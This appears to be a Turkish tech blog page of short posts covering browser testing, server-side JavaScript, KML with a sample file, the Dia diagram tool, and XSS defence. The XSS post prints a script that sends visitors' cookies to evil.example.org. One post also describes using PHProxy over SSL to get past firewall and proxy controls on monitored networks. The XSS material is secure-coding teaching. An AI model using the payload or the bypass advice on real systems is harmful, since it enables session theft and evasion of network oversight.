willing is not enough, you must do."
Lee
Geliştirdiğiniz sayfaların farklı tarayıcılarda nasıl gözüktüğünü bu aracı kullanarak kontrol edebilirsiniz.
Internet explorer 5.5, 6, 7, 8, 9 – Firefox -Chrome - Opera – Safari tarayıcılarını destekliyor.
http://s3.amazonaws.com/four.livejournal/20091117/jsconf.pdf
- Server-side Javascript
- Built on Google’s V8
- Evented, non-blocking I/O. Similar to EventMachine or Twisted.
- CommonJS module system.
- 8000 lines of C/C++, 2000 lines of Javascript, 14 contributor
html5 mutlaka duymuşsunuzdur, kullanımı ile ilgili yukarıdaki bağlantılar ilginizi çekecektir.
web .20 templates, banners, icons, fonts
Kurulumunu gerçekleştirdiğiniz host üzerinden surf yapmanızı sağlar.
Sıkı denetimin yapıldığı iç ağdaki kontroller (firewall, transparent proxy control), SSL destekli bir host üzerine PHProxy kurulumu yapılarak, Encrypted trafik ile bypass edilebilir.
Kml OpenGIS (http://en.wikipedia.org/wiki/Opengis) tarafından standartları belirlenen temelde XML yapısı üzerine inşa edilmiş, veri standardıdır. Veri barındırmak dışında uygulamalara özel çağrılar yapmak için ve stil tanımları için sahip olduğu etiketler kullanılır.
Google maps api, openlayers veya google earth api kullanarak geliştireceğiniz harita uygulamaları üzerinde standartlarla çalışmak istiyorsanız KML kullanabilirsiniz. Oluşturduğunuz KML dosyalarını google earth masaüstü sürümünü kullanarak da görüntüleyebilirsiniz. Google earth masaüstü sürümü kullanarak oluşturduğunuz katmanı kopyalayıp, herhangi bir metin editörüne yapıştırırsanız earth api üzerinde oluşturulan tüm katmanların aslında KML üzerine inşa edildiğini görebilirsiniz.
KML öğrenmek için code.google.com altında oluşturulan: http://code.google.com/intl/tr-TR/apis/kml/documentation/ adresini ziyaret edebilirsiniz. Google standart KML tanımları üzerine Gx: ile başlayan etikeler eklemiştir. Bu etiketler google uygulamalarına özel olarak kullanılabiliyor. Örneğin Gx:track etiketini kullanarak earth api üzerinde çizdirdiğiniz yolu takip eden bir araç uygulamasını kolaylıkla geliştirebilirsiniz.
Farklı mapping API ‘lerinin sunmuş olduğu farklı sınıf ve methodları öğrenmeye çalışmaktansa, sadece KML standardını çok iyi öğrenerek uygulamalarımızı farklı API ‘lerle kolayca entegre çalışır hale getirebiliriz.
Aşağıda basit bir KML örneği bulunuyor.
<?xml version="1.0" encoding="UTF-8"?>
<kml xmlns="http://www.opengis.net/kml/2.2">
<Placemark>
<name>Simple placemark</name>
<description>Attached to the ground. Intelligently places itself
at the height of the underlying terrain.</description>
<Point>
<coordinates>-122.0822035425683,37.42228990140251,0</coordinates>
</Point>
</Placemark>
</kml>
Örnekteki kodu metin düzenleme editörüne yapıştırıp, test.kml olarak kaydediniz. Google earth programı ile kml dosyasını açıp sonucu görebilirsiniz.
Dökümanı zaman buldukça örneklerle genişleteceğim,
17/11/2010, İzmir
Microsoft visio alternatifi diagram çizimleriniz için kullanabileceğiniz ücretsiz bir alternatif…
http://live.gnome.org/Dia/Screenshots
Web uygulamalarında kullanıcıdan gelen ve filtrelenmeden yazdırılan girdiler sömürüye açıktır. Geliştiriciye özel veya ziyaretçilerin görebileceği sayfalara bindirilen javascript kodları sayesinde ziyaretçilere ait document.cookie arkasında saklanan sessionid bilgileri ele geçirilebilir.
<script>document.location = ‘http://evil.example.org/steal_cookies.php?cookies=’ + document.cookie;</script>
Örnek ataklar;
Örnek güvenli kullanımlar
<?php print ‘<input type=”text” id=”var1” name=”var1” value=”’.htmlspecialchars($datarow[“col_name”]).’”> ’; ?>
<?php print ‘<textarea name=”var2”>’.htmlspecialchars($datarow[“col_name”]).’”</textarea> ’; ?>
http://tr.wikipedia.org/wiki/Cross_site_scripting
http://phpsec.org/projects/guide/2.html
Aşağıdaki açıklamalar phpsec.org’dan alınmıştır.
What can you do? XSS is actually very easy to defend against. Where things get difficult is when you want to allow some HTML or client-side scripts to be provided by external sources (such as other users) and ultimately displayed, but even these situations aren’t terribly difficult to handle. The following best practices can mitigate the risk of XSS:
- Filter all external data.
- As mentioned earlier, data filtering is the most important practice you can adopt. By validating all external data as it enters and exits your application, you will mitigate a majority of XSS concerns.
- Use existing functions
- Let PHP help with your filtering logic. Functions like htmlspecialchars (), htmlentities(), strip_tags(), and utf8_decode() can be useful. Try to avoid reproducing something that a PHP function already does. Not only is the PHP function much faster, but it is also more tested and less likely to contain errors that yield vulnerabilities.
- Use a whitelist approach.
- Assume data is invalid until it can be proven valid. This involves verifying the length and also ensuring that only valid characters are allowed. For example, if the user is supplying a last name, you might begin by only allowing alphabetic characters and spaces. Err on the side of caution. While the names O’Reilly and Berners-Lee will be considered invalid, this is easily fixed by adding two more characters to the whitelist. It is better to deny valid data than to accept malicious data.
- Use a strict naming convention.
- As mentioned earlier, a naming convention can help developers easily distinguish between filtered and unfiltered data. It is important to make things as easy and clear for developers as possible. A lack of clarity yields confusion, and this breeds vulnerabilities.
google style complex and minimized js code
http://maps.gstatic.com/intl/tr_ALL/mapfiles/277b/maps2.api/main.js
Filtrelenmiş taramalardan ve google aramaları için getirilen kısıtlamalardan şifreli (encrypted) paketler sayesinde sayesinde kurtuluyorsunuz.
Contact us
